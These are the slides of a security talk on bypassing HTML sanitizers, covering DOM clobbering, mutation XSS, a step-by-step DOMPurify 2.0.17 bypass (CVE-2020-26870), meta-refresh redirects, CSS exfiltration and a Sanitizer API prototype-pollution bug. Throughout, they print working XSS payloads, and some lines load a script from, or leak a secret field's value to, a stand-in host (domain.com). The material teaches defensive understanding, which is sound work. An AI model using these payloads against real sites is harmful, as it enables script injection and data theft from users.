Is it possible to bypass an HTML sanitizer ?

Kévin GERVOT (Mizu)

Cybersecurity student at ESAIP

CTF Player @Rhackgondins

Bug Hunter

https://mizu.re

@kevin_mizu

HTML Sanitizer

In data sanitization, HTML sanitization is the process of examining an HTML document and producing a new HTML document that preserves only whatever tags are designated "safe" and desired. HTML sanitization can be used to protect against attacks such as cross-site scripting (XSS) by sanitizing any HTML code submitted by a user.

Source: wikipedia.org

Examples: DOMPurify, sanitize-html, js-xss...

Basic client-side sanitizer

Browser API: DOMParser

HTML Input

<html>
    <head></head>
    <body>
    	<h1 id="title"> Hello World! </h1>
    </body>
</html>

DOM Tree

Browser API: DOMParser

var html = "XXX";
var dom_tree = new DOMParser().parseFromString(html, mime_type);

dom_tree.body
> #document
<html>
    <head></head>
    <body>XXX</body>
</html>

Browser API: NodeIterator

var currentNode;
var input    = "<h1>HELLO</h1><h2>World!</h2><span>TEST</span>"; 
var dom_tree = new DOMParser().parseFromString(input, "text/html");

var nodeIterator = document.createNodeIterator(dom_tree);
while ((currentNode = nodeIterator.nextNode())) {

    switch(currentNode.nodeType) {
        case currentNode.ELEMENT_NODE:
            console.log(currentNode.nodeName.toLowerCase());
    }

}

// Output:
html
head
body
h1

"Simple" example

class Sanitizer {

    constructor() {
        this.version = "1.0.0";
        this.creator = "@kevin_mizu";
        this.ALLOWED_TAGS = ["a", "abbr", ..., "html", "head", "h1", "body"];
        this.ALLOWED_ATTRIBUTES = ["accept", "action", ..., "xmlns", "slot"];
    }

    sanitize = (input) => {
        var currentNode = "";
        // parse the user input
        var dom_tree = new DOMParser().parseFromString(input, "text/html");

        // iterate over all nodes
        var nodeIterator = document.createNodeIterator(dom_tree);
        while ((currentNode = nodeIterator.nextNode())) {

            switch(currentNode.nodeType) {
            	// in case it is a node
                case currentNode.ELEMENT_NODE:
                    var tag_name   = currentNode.nodeName.toLowerCase();
                    var attributes = currentNode.attributes;

                    // sanitize tags
                    if (!this.ALLOWED_TAGS.includes(tag_name)){
                        currentNode.parentElement.removeChild(currentNode);
                    }

                    // sanitize attributes
                    for (let i=0; i < attributes.length; i++) {
                        if (!this.ALLOWED_ATTRIBUTES.includes(attributes[i].name)){
                            currentNode.parentElement.removeChild(currentNode);
                            break;
                        }
                    }
            }
    	}
        // return the sanitized value
        return dom_tree.documentElement.innerHTML;
    }
}

// use the sanitizer
var s 	 = new Sanitizer();
var safe = s.sanitize("<h1>HTML INPUT</h1>");
document.write(safe);

DOM clobbering is a technique in which you inject HTML into a page to manipulate the DOM and ultimately change the behavior of JavaScript on the page. DOM clobbering is particularly useful in cases where XSS is not possible, but you can control some HTML on a page where the attributes id or name are whitelisted by the HTML filter.

Source: portswigger.net

DOM Clobbering

Window based (BOM)

Creating a tag with an id value will create the associated variable in the window object.
The variable is created if it doesn't exist.
Each variable defined in the window object is accessible from the global context.

Document based (DOM)

Creating a tag* with a name value will create the associated variable in the document object.
The variable is created in global context if it doesn't exist.
The variable will overwrite all object in the document object.

* img, iframe (chrome only), form, embed, object -> all tags affected by the target attribute.

Funny example

<img name="scripts" src="https://unpkg.com/react@18/umd/react.development.js">
<img name="scripts" src="https://unpkg.com/react-dom@18/umd/react-dom.development.js">

Vulnerable code

<script>

    window.onload = function(){

        let someObject = window.someObject || {};

        let script = document.createElement('script');
        script.src = someObject.url;
        document.body.appendChild(script);
    };

</script>

Source: PortSwigger

HTML Collection (Chrome only)

<a id="my_collection" name="tag_1"></a>
<a id="my_collection"></a>

<a> tag with href

<a id="my_variable" href="my_value"></a>

Bypass

<script>

    window.onload = function(){

        let someObject = window.someObject || {};

        let script = document.createElement('script');
        script.src = someObject.url;
        document.body.appendChild(script);
    };

</script>

<a id="someObject">
<a id="someObject" name="url" href="http://domain.com/xss.js">

Want to practice?

Mutation XSS

https://security.stackexchange.com/questions/46836/what-is-mutation-xss-mxss

Simple mutation

<svg>
    <p></p>
    mutation
</svg>

2019 - Google Search mXSS

By Masato Kinugawa

2019 - Google Search mXSS

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

Simple mXSS payloads

Tag based

iframe | noscript | textarea | style | xmp | noframes | script | noembed | title

<vulnerable><p id="</vulnerable><img src=x onerror=alert()>">mXSS</p>


Commentary based

<!-- <p id="---><img src=x onerror=alert()>">mXSS</p>
<![CDATA[ <! <p id="]]><img src=x onerror=alert()>">mXSS</p>
<! <p id="!><img src=x onerror=alert()>">mXSS</p>
<? <p id="?><img src=x onerror=alert()>">mXSS</p>
</ <p id="/><img src=x onerror=alert()>">mXSS</p>

In real sanitizer context, it won't work with a simple mutation XSS ...

CVE-2020-26870
mXSS in DOMPurify 2.0.17

by MICHAŁ BENTKOWSKI

Exploit

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

The Web Hypertext Application Technology Working Group is a community of people interested in evolving HTML and related technologies. The WHATWG was founded by individuals from Apple Inc., the Mozilla Foundation and Opera Software, leading Web browser vendors, in 2004.

Source: wikipedia.org

WhatWG

Style parsing

<style>
    <a href='https://mizu.re/'>HELLO</a>
</style>

Namespaces

<html>
    <head></head>
    <body>
    	HTML NAMESPACE
        
        <svg>
        	SVG NAMESPACE
        </svg>
        
        <math>
        	MATHL NAMESPACE
        </math>
    </body>
</html>

HTML Namespace | SVG Namespace | MathML Namespace

Namespaces differences example

<style>
    <a href='https://mizu.re/'>HELLO</a>
</style>

<math>
    <style>
        <a href='https://mizu.re'>HELLO</a>
    </style>
</math>

Namespaces differences example

HTML namespace

MathML namespace

Exploit chain

Finding double mutation

<form id="outer">
    <div>
</form>
<form id="inner">
    <input>

HTML Input

<form id="outer">
    <div>
        <form id="inner">
            <input>
        </form>
    </div>
</form>

1st Parsing

<form id="outer">
    <div>
        <input>
    </div>
</form>

2nd Parsing

To sum up

<style> tag content is text in HTML namespace
<style> tag content is HTML in MathML namespace
<form> tag can't contain another <form> tag

Exploit chain

Exploit chain idea

HTML Input

<form id="outer">
    <NAMESPACE A>
        <form id="inner">
            <NAMESPACE B>
            	<style>
                MALICIOUS INPUT
                </style>
            </NAMESPACE B>
        </form>
    </NAMESPACE A>
</form>

1st Parsing

<form id="outer">
    <NAMESPACE A>
        <NAMESPACE B></NAMESPACE B>
        <style>MALICIOUS INPUT</style>
    </NAMESPACE A>
</form>

2nd Parsing

TEXT

HTML

Integration Points

<math>
    <mtext>
        <style>
            <a href="https://mizu.re/"></a>
        </style>
    </mtext>
</math>

Integration Points

MathML namespace

HTML namespace

<mtext> tag

Exceptions

<math>
    <mtext>
        <mglyph>
            <style>
                <a href="https://mizu.re/"></a>
            </style>
        </mglyph>
    </mtext>
</math>

Exceptions

MathML namespace

<mtext> tag

<mglyph> tag

MathML namespace

To sum up

<style> tag content is text in HTML namespace
<style> tag content is HTML in MathML namespace
<form> tag can't contain another <form> tag
Text or HTML integration point = HTML namespace
If <mtext><mglyph> = MathML namespace

Final exploit - Step 1

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

Final exploit - Step 2

Malicious input = text = safe, thanks to mglyph HTML integration point

MathML namespace

Integration

Point

HTML namespace

Final exploit - Step 2

<form>
    <math>
        <mtext>
            <form>
                <mglyph>
                    <style>
                        </math><img src onerror=alert(1)>
                    </style>
                </mglyph>
            </form>
        </mtext>
    </math>
</form>

Final exploit - Step 2->3

<form>
    <math>
        <mtext>
            <form>
                <mglyph>
                    <style>
                        </math><img src onerror=alert(1)>
                    </style>
                </mglyph>
            </form>
        </mtext>
    </math>
</form>

HTML namespace -> MathML namespace

Exception

</math> escape MathML namespace

Final exploit - Step 3

HTML namespace

Final exploit - Step 3

<form>
    <math>
        <mtext>
            <mglyph>
                <style></style>
            </mglyph>
        </mtext>
    </math>
    <img src="" onerror="alert(1)">
</form>

Final exploit - Step 3

Target attribute

<a target="iframe" href="https://domain.com/">CLICK ME</a>
<form action="https://domain.com" method="GET" target="iframe">
    <input type="submit" value="CLICK ME">
</form>

<base target="iframe">
<a href="https://domain.com/">CLICK ME</a>

<iframe name="iframe" srcdoc="waiting..."></iframe>

Still working on:

New chrome sanitizer API
js-xss
???

meta tag

Still working on:

New chrome sanitizer API
???

<meta http-equiv="refresh" content="delay;URL=destination-address">

<meta http-equiv="refresh" content="0;URL=https://domain.com/">

CSS Exfiltration

<style>
    input[name="secret"][value^=a]{
        background-image: url(http://domain.com/exfil/a);
    }

    ...

    input[name="secret"][value^=Z]{
        background-image: url(http://domain.com/exfil/Z);
    }
</style>

Challenge example: (FCSC 2022)

https://mizu.re/post/cloud_password_manager

https://github.com/PortSwigger/css-exfiltration

Prototype pollution

https://bugs.chromium.org/p/chromium/issues/detail?id=1306450&q=SanitizerAPI&can=1

<!doctype html>
<script>
// We're simulating prototype pollution here
Object.prototype.allowElements = ['svg:svg', 'svg:use'];
</script>
<body>
<script>

// We assume that this is the original JavaScript of a website
const s = new Sanitizer({});
const sanitized = s.sanitizeFor("div", `<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#x" /></svg>`);
document.body.replaceChildren(sanitized); // alert executes!

</script>

Parser differentials

https://bugs.chromium.org/p/chromium/issues/detail?id=1231037